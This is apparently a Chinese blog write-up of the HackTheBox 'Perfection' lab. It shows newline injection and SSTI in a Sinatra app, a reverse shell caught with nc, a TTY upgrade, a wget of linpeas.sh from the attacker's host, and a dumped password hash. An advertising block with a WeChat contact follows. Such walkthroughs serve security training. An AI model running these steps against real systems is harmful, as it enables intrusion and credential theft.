经过尝试发现可以使用 %0a 截断,发现截断之后,后面输入内容都被输出在页面

刷新页面后发现页面中显示如下,将下面的代码复制交给chatgpt,得到了下面的答案。“您提供的代码片段似乎是基于Ruby的Sinatra框架。Sinatra是一个轻量级的Ruby web开发框架,用于构建基于Ruby的web应用程序。”,没啥好玩的

经过尝试,发现了ssti,按照下图第三条

结果如下

找一个反向 shell 连接脚本

在监听端成功获取反弹shell

┌──(kali㉿kali)-[~] └─$ nc -nvlp 4444 listening on [any] 4444 … connect to [10.10.14.19] from (UNKNOWN) [10.10.11.253] 56398 susan@perfection:~/ruby_app$ whoami whoami susan susan@perfection:~/ruby_app$

Privilege Escalation

升级shell

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ susan@perfection:~/ruby_app$ ^Z zsh: suspended nc -nvlp 4444

┌──(kali㉿kali)-[~] └─$ stty raw -echo;fg [1] + continued nc -nvlp 4444 reset reset: unknown terminal type unknown Terminal type? screen

懒得一个一个看了,直接上传 linpeas.sh 来检索系统弱点

susan@perfection:/tmp$ wget http://10.10.14.19:8888/linpeas.sh –2024-03-11 09:42:22-- http://10.10.14.19:8888/linpeas.sh Connecting to 10.10.14.19:8888… connected. HTTP request sent, awaiting response… 200 OK Length: 860549 (840K) [text/x-sh] Saving to: ‘linpeas.sh’

linpeas.sh 100%[===================>] 840.38K 219KB/s in 3.8s

2024-03-11 09:42:30 (219 KB/s) - ‘linpeas.sh’ saved [860549/860549]

为脚本添加执行权限,然后执行等待结果即可,在运行过程中就看到了下面这两行,susan 就可以查看user.txt

╔══════════╣ Readable files belonging to root and readable by me but not world readable -rw-r----- 1 root susan 625 May 14 2023 /var/mail/susan -rw-r----- 1 root susan 33 Mar 11 07:23 /home/susan/user.txt

在 /home/susan 目录下,存在 Migration 目录,有一个

.db文件,使用 cat 命令查看可以看到一组 hash 值

susan@perfection:~/Migration$ cat pupilpath_credentials.db ��^�ableusersusersCREATE TABLE users ( id INTEGER PRIMARY KEY, name TEXT, password TEXT a� Susan Millerabeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f

使用 hash-identifier 可以识别 hash 类别,但是破解失败

┌──(kali㉿kali)-[~] └─$ hash-identifier #########################################################################

__ __ __ ______ _____

/\ /\ \ /\ \ /__ _\ /\ _ `\

\ \ _\ \ __ ____ \ \ ___ /_/\ / \ \ /\ \

\ \ _ \ /'__\ / ,__\ \ \ _ \ \ \ \ \ \ \ \ \

\ \ \ \ /\ _\ _/_, `\ \ \ \ \ \ _\ _ \ \ _\ \

\ _\ _\ ___ _/_/ \ _\ _\ /_\ \ ___/

////////// //// /__/ // v1.2

By Zion3R

www.Blackploit.com

Root@Blackploit.com

#########################################################################

HASH: abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f

Possible Hashs: [+] SHA-256 [+] Haval-256

Least Possible Hashs: [+] GOST R 34.11-94 [+] RipeMD-256 [+] SNEFRU-256

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**

好文链接

评论可见,请评论后查看内容,谢谢!!!
 您阅读本篇文章共花了: